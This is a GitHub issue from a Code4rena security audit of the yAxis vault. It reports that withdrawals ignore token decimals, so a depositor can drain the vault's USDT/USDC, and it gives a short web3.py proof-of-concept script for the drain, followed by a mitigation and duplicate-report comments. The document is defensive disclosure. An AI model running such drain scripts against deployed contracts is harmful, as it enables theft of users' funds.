code423n4 commented 3 years ago

Handle

jonah1005

Vulnerability details

Impact

The vault does not normalize decimals when a user withdraws the token. When a user has 100e18 shares, he can withdraw all usdc/ usdt from the token.

The liquidity of USDC/USDC would be drained. I consider this is a high-risk issue.

Proof of Concept

Vault.sol#L232-L261

This is the web3.py script to drain all usdt from the vault.

usdt_balance = usdt.functions.balanceOf(vault.address).call()
print('previous usdt:', usdt_balance)
# We deposit some margin dai to drain all liquidity.
deposit_amount = usdt_balance + usdt_balance
dai.functions.approve(vault.address, deposit_amount).transact()
vault.functions.deposit(dai.address, deposit_amount).transact()
print('amount of share:', vault.functions.balanceOf(user).call())
vault.functions.withdrawAll(usdt.address).transact()

## usdt would left zero
print('usdt left:', usdt.functions.balanceOf(vault.address).call())

Tools Used

None

Recommended Mitigation Steps

Normalize decimals on withdrawing.

gpersoon commented 2 years ago

Seems duplicate of #73

GalloDaSballo commented 2 years ago

Duplicate of #131

code-423n4 / 2021-09-yaxis-findings